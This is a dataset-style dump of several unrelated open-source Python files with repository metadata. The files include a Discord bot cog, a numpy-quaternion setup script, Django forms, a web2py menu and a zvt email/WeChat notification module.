async def subscribe(self, ctx, *, channel: disnake.TextChannel=None):
if channel:
await self.bot.guild_cache.set_dailygachi(ctx.guild.id, channel.id)
return await ctx.send(f'New dailygachi channel set to {channel}')
channel = self.bot.guild_cache.dailygachi(ctx.guild.id)
channel = ctx.guild.get_channel(channel)
if channel:
await ctx.send(f'Current dailygachi channel is {channel}')
else:
await ctx.send('No dailygachi channel set')
@dailygachi.command()
@cooldown(1, 5)
@has_permissions(manage_guild=True)
@guild_only()
async def unsubscribe(self, ctx):
await self.bot.guild_cache.set_dailygachi(ctx.guild.id, None)
await ctx.send('Dailygachi channel no longer set')
@command()
@cooldown(1, 5, BucketType.member)
@guild_only()
async def wrestle(self, ctx, *, user: disnake.User):
if user == ctx.author:
await ctx.send('Wrestling against yourself...')
return
wrestling_gif = choice(wrestling_gifs)
await ctx.send(embed=wrestling_gif.build_embed(ctx.author, user))
def setup(bot):
bot.add_cog(gachiGASM(bot))
| true
| true
|
f705a3715e94cf0904331d0ec946cb635a00608e
| 4,169
|
py
|
Python
|
setup.py
|
igilitschenski/quaternion
|
44dd138fa7e95e55d0ccd4a7620a3587cf314b4f
|
[
"MIT"
] | 2
|
2018-08-12T02:01:37.000Z
|
2020-05-12T11:56:07.000Z
|
setup.py
|
igilitschenski/quaternion
|
44dd138fa7e95e55d0ccd4a7620a3587cf314b4f
|
[
"MIT"
] | 1
|
2018-08-12T21:05:01.000Z
|
2018-08-12T21:05:01.000Z
|
setup.py
|
igilitschenski/quaternion
|
44dd138fa7e95e55d0ccd4a7620a3587cf314b4f
|
[
"MIT"
] | 1
|
2020-10-01T08:49:33.000Z
|
2020-10-01T08:49:33.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018, Michael Boyle
# See LICENSE file for details: <https://github.com/moble/quaternion/blob/master/LICENSE>
# Construct the version number from the date and time this python version was created.
from os import environ
from sys import platform
on_windows = ('win' in platform.lower() and not 'darwin' in platform.lower())
if "package_version" in environ:
version = environ["package_version"]
print("Setup.py using environment version='{0}'".format(version))
else:
print("The variable 'package_version' was not present in the environment")
try:
# For cases where this is being installed from git. This gives the true version number.
from subprocess import check_output
if on_windows:
version = check_output("""git log -1 --format=%cd --date=format:'%Y.%m.%d.%H.%M.%S'""", shell=False)
version = version.decode('ascii').strip().replace('.0', '.').replace("'", "")
else:
version = check_output("""git log -1 --format=%cd --date=format:'%Y.%-m.%-d.%-H.%-M.%-S'""", shell=True).decode('ascii').rstrip()
print("Setup.py using git log version='{0}'".format(version))
except:
# For cases where this isn't being installed from git. This gives the wrong version number,
# but at least it provides some information.
try:
from time import strftime, gmtime
try:
version = strftime("%Y.%-m.%-d.%-H.%-M.%-S", gmtime())
except ValueError: # because Windows
version = strftime("%Y.%m.%d.%H.%M.%S", gmtime()).replace('.0', '.')
print("Setup.py using strftime version='{0}'".format(version))
except:
version = '0.0.0'
print("Setup.py failed to determine the version; using '{0}'".format(version))
with open('_version.py', 'w') as f:
f.write('__version__ = "{0}"'.format(version))
long_description = """\
This package creates a quaternion type in python, and further enables numpy to create and manipulate arrays of
quaternions. The usual algebraic operations (addition and multiplication) are available, along with numerous
properties like norm and various types of distance measures between two quaternions. There are also
additional functions like "squad" and "slerp" interpolation, and conversions to and from axis-angle, matrix,
and Euler-angle representations of rotations. The core of the code is written in C for speed.
"""
if __name__ == "__main__":
import numpy
from setuptools import setup, Extension
# from distutils.core import setup, Extension
from distutils.errors import DistutilsError
if numpy.__dict__.get('quaternion') is not None:
raise DistutilsError('The target NumPy already has a quaternion type')
extension = Extension(
name='quaternion.numpy_quaternion', # This is the name of the object file that will be compiled
sources=['quaternion.c', 'numpy_quaternion.c'],
extra_compile_args=['/O2' if on_windows else '-O3'],
depends=['quaternion.c', 'quaternion.h', 'numpy_quaternion.c'],
include_dirs=[numpy.get_include()]
)
extension2 = Extension(
name='quaternion.numpy_dual_quaternion', # This is the name of the object file that will be compiled
sources=['dual_quaternion.c', 'numpy_dual_quaternion.c'],
extra_compile_args=['/O2' if on_windows else '-O3'],
depends=['dual_quaternion.c', 'dual_quaternion.h', 'numpy_dual_quaternion.c'],
include_dirs=[numpy.get_include()]
)
setup(name='numpy-quaternion', # Uploaded to pypi under this name
packages=['quaternion'], # This is the actual package name
package_dir={'quaternion': ''},
ext_modules=[extension, extension2],
version=version,
install_requires=[
'numpy>=1.13',
],
url='https://github.com/moble/quaternion',
author='Michael Boyle',
author_email='mob22@cornell.edu',
description='Add built-in support for quaternions to numpy',
long_description=long_description,
)
| 49.047059
| 141
| 0.656272
|
from os import environ
from sys import platform
on_windows = ('win' in platform.lower() and not 'darwin' in platform.lower())
if "package_version" in environ:
version = environ["package_version"]
print("Setup.py using environment version='{0}'".format(version))
else:
print("The variable 'package_version' was not present in the environment")
try:
from subprocess import check_output
if on_windows:
version = check_output("""git log -1 --format=%cd --date=format:'%Y.%m.%d.%H.%M.%S'""", shell=False)
version = version.decode('ascii').strip().replace('.0', '.').replace("'", "")
else:
version = check_output("""git log -1 --format=%cd --date=format:'%Y.%-m.%-d.%-H.%-M.%-S'""", shell=True).decode('ascii').rstrip()
print("Setup.py using git log version='{0}'".format(version))
except:
# For cases where this isn't being installed from git. This gives the wrong version number,
try:
from time import strftime, gmtime
try:
version = strftime("%Y.%-m.%-d.%-H.%-M.%-S", gmtime())
except ValueError:
version = strftime("%Y.%m.%d.%H.%M.%S", gmtime()).replace('.0', '.')
print("Setup.py using strftime version='{0}'".format(version))
except:
version = '0.0.0'
print("Setup.py failed to determine the version; using '{0}'".format(version))
with open('_version.py', 'w') as f:
f.write('__version__ = "{0}"'.format(version))
long_description = """\
This package creates a quaternion type in python, and further enables numpy to create and manipulate arrays of
quaternions. The usual algebraic operations (addition and multiplication) are available, along with numerous
properties like norm and various types of distance measures between two quaternions. There are also
additional functions like "squad" and "slerp" interpolation, and conversions to and from axis-angle, matrix,
and Euler-angle representations of rotations. The core of the code is written in C for speed.
"""
if __name__ == "__main__":
import numpy
from setuptools import setup, Extension
from distutils.errors import DistutilsError
if numpy.__dict__.get('quaternion') is not None:
raise DistutilsError('The target NumPy already has a quaternion type')
extension = Extension(
name='quaternion.numpy_quaternion',
sources=['quaternion.c', 'numpy_quaternion.c'],
extra_compile_args=['/O2' if on_windows else '-O3'],
depends=['quaternion.c', 'quaternion.h', 'numpy_quaternion.c'],
include_dirs=[numpy.get_include()]
)
extension2 = Extension(
name='quaternion.numpy_dual_quaternion',
sources=['dual_quaternion.c', 'numpy_dual_quaternion.c'],
extra_compile_args=['/O2' if on_windows else '-O3'],
depends=['dual_quaternion.c', 'dual_quaternion.h', 'numpy_dual_quaternion.c'],
include_dirs=[numpy.get_include()]
)
setup(name='numpy-quaternion',
packages=['quaternion'],
package_dir={'quaternion': ''},
ext_modules=[extension, extension2],
version=version,
install_requires=[
'numpy>=1.13',
],
url='https://github.com/moble/quaternion',
author='Michael Boyle',
author_email='mob22@cornell.edu',
description='Add built-in support for quaternions to numpy',
long_description=long_description,
)
| true
| true
|
f705a4cd64c0bf62c1cc3fdc3fdff2a1600a087a
| 879
|
py
|
Python
|
textworld/challenges/tests/test_coin_collector.py
|
JohnnySun8/TextWorld
|
9a54e9d642f7605a0f3ebba3285cdd04047975e2
|
[
"MIT"
] | 307
|
2019-05-07T01:51:55.000Z
|
2022-03-31T19:35:47.000Z
|
textworld/challenges/tests/test_coin_collector.py
|
JohnnySun8/TextWorld
|
9a54e9d642f7605a0f3ebba3285cdd04047975e2
|
[
"MIT"
] | 84
|
2019-05-08T14:24:36.000Z
|
2022-03-31T14:35:16.000Z
|
textworld/challenges/tests/test_coin_collector.py
|
JohnnySun8/TextWorld
|
9a54e9d642f7605a0f3ebba3285cdd04047975e2
|
[
"MIT"
] | 70
|
2019-05-21T21:36:56.000Z
|
2022-02-28T12:04:27.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
import textworld
from textworld.challenges import coin_collector
def test_making_coin_collector():
expected = {
1: {"quest_length": 1, "nb_rooms": 1},
100: {"quest_length": 100, "nb_rooms": 100},
101: {"quest_length": 1, "nb_rooms": 2},
200: {"quest_length": 100, "nb_rooms": 200},
201: {"quest_length": 1, "nb_rooms": 3},
300: {"quest_length": 100, "nb_rooms": 300},
}
for level in [1, 100, 101, 200, 201, 300]:
options = textworld.GameOptions()
options.seeds = 1234
settings = {"level": level}
game = coin_collector.make(settings, options)
assert len(game.quests[0].commands) == expected[level]["quest_length"]
assert len(game.world.rooms) == expected[level]["nb_rooms"]
| 35.16
| 78
| 0.624573
|
import textworld
from textworld.challenges import coin_collector
def test_making_coin_collector():
expected = {
1: {"quest_length": 1, "nb_rooms": 1},
100: {"quest_length": 100, "nb_rooms": 100},
101: {"quest_length": 1, "nb_rooms": 2},
200: {"quest_length": 100, "nb_rooms": 200},
201: {"quest_length": 1, "nb_rooms": 3},
300: {"quest_length": 100, "nb_rooms": 300},
}
for level in [1, 100, 101, 200, 201, 300]:
options = textworld.GameOptions()
options.seeds = 1234
settings = {"level": level}
game = coin_collector.make(settings, options)
assert len(game.quests[0].commands) == expected[level]["quest_length"]
assert len(game.world.rooms) == expected[level]["nb_rooms"]
| true
| true
|
f705a62076eaad583f13420e3065b76727c22256
| 2,831
|
py
|
Python
|
core/cooggerapp/forms.py
|
maksatweb/coogger
|
480d4cccb2c6876fba116511b72775e2e434245b
|
[
"MIT"
] | null | null | null |
core/cooggerapp/forms.py
|
maksatweb/coogger
|
480d4cccb2c6876fba116511b72775e2e434245b
|
[
"MIT"
] | null | null | null |
core/cooggerapp/forms.py
|
maksatweb/coogger
|
480d4cccb2c6876fba116511b72775e2e434245b
|
[
"MIT"
] | 1
|
2019-07-01T10:08:33.000Z
|
2019-07-01T10:08:33.000Z
|
# django
from django import forms
from django.contrib.auth.models import User
# choices
from core.cooggerapp.choices import *
# models
from core.cooggerapp.models import (
Content, OtherAddressesOfUsers, UserProfile,
ReportModel, UTopic, Issue)
from .models.utils import send_mail
class UTopicForm(forms.ModelForm):
class Meta:
model = UTopic
fields = ["name", "image_address", "definition", "tags", "address"]
class ContentForm(forms.ModelForm):
msg = forms.CharField(
max_length=150,
label="Commit Message",
help_text="What has changed with this update?"
)
class Meta:
model = Content
fields = ["category", "language", "title", "body", "tags"]
@classmethod
def send_mail(cls, form):
send_mail(
subject = f"{form.user} publish a new content | coogger".title(),
template_name="email/post.html",
context=dict(
get_absolute_url=form.get_absolute_url
),
to=[u.user.email for u in form.user.follow.follower if u.user.email],
)
class ReplyForm(forms.ModelForm):
class Meta:
model = Content
fields = ["title", "body"]
class AddressesForm(forms.ModelForm):
class Meta:
model = OtherAddressesOfUsers
fields = ["choices", "address"]
class CSettingsUserForm(forms.ModelForm):
class Meta:
model = User
fields = ["first_name", "last_name", "username", "email"]
class OtherAddressesOfUsersForm(forms.ModelForm):
class Meta:
model = OtherAddressesOfUsers
fields = ["choices", "address"]
class AboutForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ["about"]
class ReportsForm(forms.ModelForm):
class Meta:
model = ReportModel
fields = ["complaints", "add"]
class NewIssueForm(forms.ModelForm):
class Meta:
model = Issue
fields = ["title", "body"]
@classmethod
def send_mail(cls, form):
send_mail(
subject=f"{form.user} opened a new issue on your {form.utopic.name} topic | coogger".title(),
template_name="email/new-issue.html",
context=dict(
form=form,
),
to=[form.utopic.user.email]
)
class NewIssueReplyForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea,
help_text="problem | question | or anything else")
class Meta:
model = Issue
fields = ["body"]
class NewContentReplyForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea,
help_text="Your content | problem | question | or anything else")
class Meta:
model = Content
fields = ["body"]
| 23.396694
| 106
| 0.607559
|
from django import forms
from django.contrib.auth.models import User
from core.cooggerapp.choices import *
from core.cooggerapp.models import (
Content, OtherAddressesOfUsers, UserProfile,
ReportModel, UTopic, Issue)
from .models.utils import send_mail
class UTopicForm(forms.ModelForm):
class Meta:
model = UTopic
fields = ["name", "image_address", "definition", "tags", "address"]
class ContentForm(forms.ModelForm):
msg = forms.CharField(
max_length=150,
label="Commit Message",
help_text="What has changed with this update?"
)
class Meta:
model = Content
fields = ["category", "language", "title", "body", "tags"]
@classmethod
def send_mail(cls, form):
send_mail(
subject = f"{form.user} publish a new content | coogger".title(),
template_name="email/post.html",
context=dict(
get_absolute_url=form.get_absolute_url
),
to=[u.user.email for u in form.user.follow.follower if u.user.email],
)
class ReplyForm(forms.ModelForm):
class Meta:
model = Content
fields = ["title", "body"]
class AddressesForm(forms.ModelForm):
class Meta:
model = OtherAddressesOfUsers
fields = ["choices", "address"]
class CSettingsUserForm(forms.ModelForm):
class Meta:
model = User
fields = ["first_name", "last_name", "username", "email"]
class OtherAddressesOfUsersForm(forms.ModelForm):
class Meta:
model = OtherAddressesOfUsers
fields = ["choices", "address"]
class AboutForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ["about"]
class ReportsForm(forms.ModelForm):
class Meta:
model = ReportModel
fields = ["complaints", "add"]
class NewIssueForm(forms.ModelForm):
class Meta:
model = Issue
fields = ["title", "body"]
@classmethod
def send_mail(cls, form):
send_mail(
subject=f"{form.user} opened a new issue on your {form.utopic.name} topic | coogger".title(),
template_name="email/new-issue.html",
context=dict(
form=form,
),
to=[form.utopic.user.email]
)
class NewIssueReplyForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea,
help_text="problem | question | or anything else")
class Meta:
model = Issue
fields = ["body"]
class NewContentReplyForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea,
help_text="Your content | problem | question | or anything else")
class Meta:
model = Content
fields = ["body"]
| true
| true
|
f705a73863c89acb45d5d05655334e8f3a3a5738
| 219
|
py
|
Python
|
python/tdd/math/prime.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | 1
|
2021-08-19T13:40:26.000Z
|
2021-08-19T13:40:26.000Z
|
python/tdd/math/prime.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | null | null | null |
python/tdd/math/prime.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | 1
|
2021-03-31T12:37:14.000Z
|
2021-03-31T12:37:14.000Z
|
from math import ceil, sqrt
def my_sqrt(input_num):
return ceil(sqrt(input_num))
def is_divisible(dividend, divisor):
return dividend % divisor == 0
def is_prime(input_num):
return True
| 14.6
| 37
| 0.666667
|
from math import ceil, sqrt
def my_sqrt(input_num):
return ceil(sqrt(input_num))
def is_divisible(dividend, divisor):
return dividend % divisor == 0
def is_prime(input_num):
return True
| true
| true
|
f705a7e2c833ec94fe1fa23667a30b153375cf95
| 55
|
py
|
Python
|
pymatgen/phonon/__init__.py
|
cajfisher/pymatgen
|
286c304e38102d567723a71f733e0c304b72035d
|
[
"MIT"
] | 921
|
2015-01-25T22:17:05.000Z
|
2022-03-27T20:58:38.000Z
|
pymatgen/phonon/__init__.py
|
cajfisher/pymatgen
|
286c304e38102d567723a71f733e0c304b72035d
|
[
"MIT"
] | 1,631
|
2015-01-05T21:05:04.000Z
|
2022-03-31T18:40:17.000Z
|
pymatgen/phonon/__init__.py
|
cajfisher/pymatgen
|
286c304e38102d567723a71f733e0c304b72035d
|
[
"MIT"
] | 851
|
2015-01-01T17:38:00.000Z
|
2022-03-31T02:14:07.000Z
|
"""
Phonon DOS and bandstructure analysis package.
"""
| 13.75
| 46
| 0.727273
| true
| true
|
|
f705a8ee33fb9360f9cccd2c289e63ed88006920
| 6,249
|
py
|
Python
|
applications/welcome/models/menu.py
|
Gorang-Maniar/DGD
|
c7b2624c0d0bb0127214ec3804acbe2cc70f8ce0
|
[
"BSD-3-Clause"
] | 8
|
2018-04-13T14:54:02.000Z
|
2021-03-04T10:58:09.000Z
|
webui/applications/grid/models/menu.py
|
pouyana/teireader
|
ac0a92d8b2e570eae1c0a03fd35a7b281eccd250
|
[
"MIT"
] | 39
|
2018-03-23T09:25:38.000Z
|
2022-03-23T15:22:15.000Z
|
webui/applications/grid/models/menu.py
|
pouyana/teireader
|
ac0a92d8b2e570eae1c0a03fd35a7b281eccd250
|
[
"MIT"
] | 3
|
2019-04-09T03:49:21.000Z
|
2020-03-05T03:51:25.000Z
|
# -*- coding: utf-8 -*-
# this file is released under public domain and you can use without limitations
# web2py model file: executed on every request inside the web2py environment.
# `response`, `request`, and the HTML helpers (A, B, SPAN, XML, URL, T) are
# web2py globals injected by the framework — TODO confirm framework context.
#########################################################################
## Customize your APP title, subtitle and menus here
#########################################################################
response.logo = A(B('web',SPAN(2),'py'),XML('™ '),
    _class="brand",_href="http://www.web2py.com/")
response.title = request.application.replace('_',' ').title()
response.subtitle = ''
## read more at http://dev.w3.org/html5/markup/meta.name.html
response.meta.author = 'Your Name <you@example.com>'
response.meta.description = 'a cool new app'
response.meta.keywords = 'web2py, python, framework'
response.meta.generator = 'Web2py Web Framework'
## your http://google.com/analytics id
response.google_analytics_id = None
#########################################################################
## this is the main application menu add/remove items as required
#########################################################################
# Each menu entry is (label, active_flag, link, sub-items).
response.menu = [
    (T('Home'), False, URL('default', 'index'), [])
]
DEVELOPMENT_MENU = True
#########################################################################
## provide shortcuts for development. remove in production
#########################################################################
def _():
    # Appends the large web2py development menu (admin links, docs,
    # community links) to response.menu; called below only when
    # DEVELOPMENT_MENU is True.
    # shortcuts
    app = request.application
    ctr = request.controller
    # useful links to internal and external resources
    response.menu += [
        (SPAN('web2py', _class='highlighted'), False, 'http://web2py.com', [
            (T('My Sites'), False, URL('admin', 'default', 'site')),
            (T('This App'), False, URL('admin', 'default', 'design/%s' % app), [
                (T('Controller'), False,
                 URL('admin', 'default', 'edit/%s/controllers/%s.py' % (app, ctr))),
                (T('View'), False,
                 URL('admin', 'default', 'edit/%s/views/%s' % (app, response.view))),
                (T('Layout'), False,
                 URL('admin', 'default', 'edit/%s/views/layout.html' % app)),
                (T('Stylesheet'), False,
                 URL('admin', 'default', 'edit/%s/static/css/web2py.css' % app)),
                (T('DB Model'), False,
                 URL('admin', 'default', 'edit/%s/models/db.py' % app)),
                (T('Menu Model'), False,
                 URL('admin', 'default', 'edit/%s/models/menu.py' % app)),
                (T('Database'), False, URL(app, 'appadmin', 'index')),
                (T('Errors'), False, URL('admin', 'default', 'errors/' + app)),
                (T('About'), False, URL('admin', 'default', 'about/' + app)),
            ]),
            ('web2py.com', False, 'http://www.web2py.com', [
                (T('Download'), False,
                 'http://www.web2py.com/examples/default/download'),
                (T('Support'), False,
                 'http://www.web2py.com/examples/default/support'),
                (T('Demo'), False, 'http://web2py.com/demo_admin'),
                (T('Quick Examples'), False,
                 'http://web2py.com/examples/default/examples'),
                (T('FAQ'), False, 'http://web2py.com/AlterEgo'),
                (T('Videos'), False,
                 'http://www.web2py.com/examples/default/videos/'),
                (T('Free Applications'), False, 'http://web2py.com/appliances'),
                (T('Plugins'), False, 'http://web2py.com/plugins'),
                (T('Layouts'), False, 'http://web2py.com/layouts'),
                (T('Recipes'), False, 'http://web2pyslices.com/'),
                (T('Semantic'), False, 'http://web2py.com/semantic'),
            ]),
            (T('Documentation'), False, 'http://www.web2py.com/book', [
                (T('Preface'), False,
                 'http://www.web2py.com/book/default/chapter/00'),
                (T('Introduction'), False,
                 'http://www.web2py.com/book/default/chapter/01'),
                (T('Python'), False,
                 'http://www.web2py.com/book/default/chapter/02'),
                (T('Overview'), False,
                 'http://www.web2py.com/book/default/chapter/03'),
                (T('The Core'), False,
                 'http://www.web2py.com/book/default/chapter/04'),
                (T('The Views'), False,
                 'http://www.web2py.com/book/default/chapter/05'),
                (T('Database'), False,
                 'http://www.web2py.com/book/default/chapter/06'),
                (T('Forms and Validators'), False,
                 'http://www.web2py.com/book/default/chapter/07'),
                (T('Email and SMS'), False,
                 'http://www.web2py.com/book/default/chapter/08'),
                (T('Access Control'), False,
                 'http://www.web2py.com/book/default/chapter/09'),
                (T('Services'), False,
                 'http://www.web2py.com/book/default/chapter/10'),
                (T('Ajax Recipes'), False,
                 'http://www.web2py.com/book/default/chapter/11'),
                (T('Components and Plugins'), False,
                 'http://www.web2py.com/book/default/chapter/12'),
                (T('Deployment Recipes'), False,
                 'http://www.web2py.com/book/default/chapter/13'),
                (T('Other Recipes'), False,
                 'http://www.web2py.com/book/default/chapter/14'),
                (T('Buy this book'), False,
                 'http://stores.lulu.com/web2py'),
            ]),
            (T('Community'), False, None, [
                (T('Groups'), False,
                 'http://www.web2py.com/examples/default/usergroups'),
                (T('Twitter'), False, 'http://twitter.com/web2py'),
                (T('Live Chat'), False,
                 'http://webchat.freenode.net/?channels=web2py'),
            ]),
            (T('Plugins'), False, None, [
                ('plugin_wiki', False,
                 'http://web2py.com/examples/default/download'),
                (T('Other Plugins'), False,
                 'http://web2py.com/plugins'),
                (T('Layout Plugins'), False, 'http://web2py.com/layouts'),
            ])
        ]
    )]
if DEVELOPMENT_MENU: _()
# `auth` may be defined by another model file (e.g. db.py); add its wiki menu.
if "auth" in locals(): auth.wikimenu()
| 44.319149
| 79
| 0.478957
| true
| true
|
|
f705a92454724dc469a9dcc20bbdf310e2ec08ca
| 6,419
|
py
|
Python
|
zvt/utils/inform_utils.py
|
doncat99/zvt
|
831183bdf7a6d0fc3acd3ea51984df590078eec6
|
[
"MIT"
] | 10
|
2020-08-08T04:43:00.000Z
|
2021-07-23T05:38:11.000Z
|
zvt/utils/inform_utils.py
|
doncat99/zvt
|
831183bdf7a6d0fc3acd3ea51984df590078eec6
|
[
"MIT"
] | 1
|
2021-08-14T12:19:18.000Z
|
2021-09-30T06:44:04.000Z
|
zvt/utils/inform_utils.py
|
doncat99/zvt
|
831183bdf7a6d0fc3acd3ea51984df590078eec6
|
[
"MIT"
] | 1
|
2021-12-16T01:57:37.000Z
|
2021-12-16T01:57:37.000Z
|
# -*- coding: utf-8 -*-
import email
import json
import logging
import smtplib
from email.header import Header
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from zvt import zvt_config
from zvt.networking.request import get_http_session, sync_get, sync_post
class Informer(object):
    """Base class for notification channels.

    Subclasses override :meth:`send_message` to deliver ``body`` with
    ``title`` to ``to_user`` over a concrete transport (email, WeChat, ...).
    """

    # Shared logger for all informer subclasses.
    logger = logging.getLogger(__name__)

    def send_message(self, to_user, title, body, **kwargs):
        # Default implementation is a no-op; subclasses provide delivery.
        pass
class EmailInformer(Informer):
    """Send notification emails via the SMTP server configured in ``zvt_config``.

    Requires ``smtp_host``, ``smtp_port``, ``email_username`` and
    ``email_password`` keys in ``zvt_config``.
    """

    def __init__(self, ssl=True) -> None:
        super().__init__()
        # Use an implicit-TLS (SMTPS) connection when True.
        self.ssl = ssl

    def send_message_(self, to_user, title, body, **kwargs):
        """Send one email to ``to_user`` (a single address or a list of them)."""
        host = zvt_config['smtp_host']
        port = zvt_config['smtp_port']
        if self.ssl:
            try:
                smtp_client = smtplib.SMTP_SSL(host=host, port=port)
            except Exception:
                # Fall back to a lazily-connected client; connect() below retries.
                smtp_client = smtplib.SMTP_SSL()
        else:
            try:
                smtp_client = smtplib.SMTP(host=host, port=port)
            except Exception:
                smtp_client = smtplib.SMTP()

        smtp_client.connect(host=host, port=port)
        smtp_client.login(zvt_config['email_username'], zvt_config['email_password'])

        msg = MIMEMultipart('alternative')
        msg['Subject'] = Header(title).encode()
        msg['From'] = "{} <{}>".format(Header('zvt').encode(), zvt_config['email_username'])
        if isinstance(to_user, list):
            msg['To'] = ", ".join(to_user)
        else:
            msg['To'] = to_user
        msg['Message-id'] = email.utils.make_msgid()
        msg['Date'] = email.utils.formatdate()

        plain_text = MIMEText(body, _subtype='plain', _charset='UTF-8')
        msg.attach(plain_text)
        try:
            smtp_client.sendmail(zvt_config['email_username'], to_user, msg.as_string())
        except Exception as e:
            # Bug fix: the original passed ``e`` as a positional logging
            # argument with no '%s' placeholder, which itself triggered a
            # logging formatting error ("not all arguments converted").
            self.logger.exception('send email failed: %s', e)

    def send_message(self, to_user, title, body, sub_size=20, with_sender=True, **kwargs):
        """Send ``body``/``title`` to ``to_user``.

        A recipient list is split into batches of at most ``sub_size``
        addresses; when ``with_sender`` is True the configured sender address
        is appended to every batch so the sender keeps a copy.
        """
        if isinstance(to_user, list) and sub_size:
            size = len(to_user)
            # Number of batches, rounding up.
            if size >= sub_size:
                step_size = int(size / sub_size)
                if size % sub_size:
                    step_size = step_size + 1
            else:
                step_size = 1

            for step in range(step_size):
                sub_to_user = to_user[sub_size * step:sub_size * (step + 1)]
                if with_sender:
                    sub_to_user.append(zvt_config['email_username'])
                self.send_message_(sub_to_user, title, body, **kwargs)
        else:
            self.send_message_(to_user, title, body, **kwargs)
class WechatInformer(Informer):
    """Send WeChat template messages through the WeChat public-platform API.

    Credentials are read from ``zvt_config`` (``wechat_app_id`` /
    ``wechat_app_secrect``); note ``GET_TOKEN_URL`` is formatted once, at
    class-definition time.
    """

    GET_TOKEN_URL = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}".format(
        zvt_config['wechat_app_id'], zvt_config['wechat_app_secrect'])

    GET_TEMPLATE_URL = "https://api.weixin.qq.com/cgi-bin/template/get_all_private_template?access_token={}"
    SEND_MSG_URL = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token={}"

    # Cached access token; populated by refresh_token() in __init__.
    token = None

    def __init__(self, http_session) -> None:
        self.refresh_token(http_session)

    def refresh_token(self, http_session):
        # Fetch a fresh API access token and cache it on the instance.
        resp = sync_get(http_session, self.GET_TOKEN_URL)
        self.logger.info("refresh_token resp.status_code:{}, resp.text:{}".format(resp.status_code, resp.text))

        if resp.status_code == 200 and resp.json() and 'access_token' in resp.json():
            self.token = resp.json()['access_token']
        else:
            # NOTE(review): logger.exception outside an except block logs a
            # bogus "NoneType: None" traceback — logger.error may be intended.
            self.logger.exception("could not refresh_token")

    def send_price_notification(self, http_session, to_user, security_name, current_price, change_pct):
        """Send one price-change template message to ``to_user``."""
        the_json = self._format_price_notification(to_user, security_name, current_price, change_pct)
        the_data = json.dumps(the_json, ensure_ascii=False).encode('utf-8')

        # NOTE(review): pre-encoded UTF-8 bytes are passed as ``json=`` —
        # confirm sync_post forwards this unmodified instead of re-serializing.
        json_result = sync_post(http_session, self.SEND_MSG_URL.format(self.token), json=the_data)

        if json_result is not None:
            self.logger.info("send_price_notification to user:{} data:{} success".format(to_user, the_json))

    def _format_price_notification(self, to_user, security_name, current_price, change_pct):
        """Build the WeChat template-message payload for a price change.

        NOTE(review): assumes ``change_pct`` is numeric — the ``> 0``
        comparison raises TypeError on Python 3 if a string is passed.
        """
        # Title by direction: gain ("吃肉喝汤") vs loss ("关灯吃面").
        if change_pct > 0:
            title = '吃肉喝汤'
        else:
            title = '关灯吃面'

        # A single hard-coded, pre-registered template is used for now.
        # Registered template (for reference):
        # {
        #     "template_id": "mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U",
        #     "title": "price-change alert (涨跌幅提醒)",
        #     "content": "{{first.DATA}}\n name:{{keyword1.DATA}}\n price:{{keyword2.DATA}}\n change:{{keyword3.DATA}}\n{{remark.DATA}}"
        # }
        template_id = 'mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U'
        the_json = {
            "touser": to_user,
            "template_id": template_id,
            "url": "http://www.foolcage.com",
            "data": {
                "first": {
                    "value": title,
                    "color": "#173177"
                },
                "keyword1": {
                    "value": security_name,
                    "color": "#173177"
                },
                "keyword2": {
                    "value": current_price,
                    "color": "#173177"
                },
                "keyword3": {
                    "value": '{:.2%}'.format(change_pct),
                    "color": "#173177"
                },
                "remark": {
                    "value": "会所嫩模 Or 下海干活?",
                    "color": "#173177"
                }
            }
        }

        return the_json
if __name__ == '__main__':
    # Manual smoke test — performs real network I/O (SMTP + WeChat API) and
    # requires valid credentials in ``zvt_config``.
    email_action = EmailInformer()
    email_action.send_message(["5533061@qq.com", '2315983623@qq.com'], 'helo', 'just a test', sub_size=20)

    http_session = get_http_session()
    weixin_action = WechatInformer(http_session)
    # NOTE(review): change_pct is passed as the string '0.5%', but
    # _format_price_notification compares it with ``> 0`` — this raises
    # TypeError on Python 3; a float was probably intended.
    weixin_action.send_price_notification(http_session,
                                          to_user='oRvNP0XIb9G3g6a-2fAX9RHX5--Q',
                                          security_name='BTC/USDT',
                                          current_price=1000,
                                          change_pct='0.5%')
# the __all__ is generated
__all__ = ['Informer', 'EmailInformer', 'WechatInformer']
| 37.319767
| 128
| 0.572986
|
import email
import json
import logging
import smtplib
from email.header import Header
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from zvt import zvt_config
from zvt.networking.request import get_http_session, sync_get, sync_post
class Informer(object):
logger = logging.getLogger(__name__)
def send_message(self, to_user, title, body, **kwargs):
pass
class EmailInformer(Informer):
def __init__(self, ssl=True) -> None:
super().__init__()
self.ssl = ssl
def send_message_(self, to_user, title, body, **kwargs):
host = zvt_config['smtp_host']
port = zvt_config['smtp_port']
if self.ssl:
try:
smtp_client = smtplib.SMTP_SSL(host=host, port=port)
except:
smtp_client = smtplib.SMTP_SSL()
else:
try:
smtp_client = smtplib.SMTP(host=host, port=port)
except:
smtp_client = smtplib.SMTP()
smtp_client.connect(host=host, port=port)
smtp_client.login(zvt_config['email_username'], zvt_config['email_password'])
msg = MIMEMultipart('alternative')
msg['Subject'] = Header(title).encode()
msg['From'] = "{} <{}>".format(Header('zvt').encode(), zvt_config['email_username'])
if type(to_user) is list:
msg['To'] = ", ".join(to_user)
else:
msg['To'] = to_user
msg['Message-id'] = email.utils.make_msgid()
msg['Date'] = email.utils.formatdate()
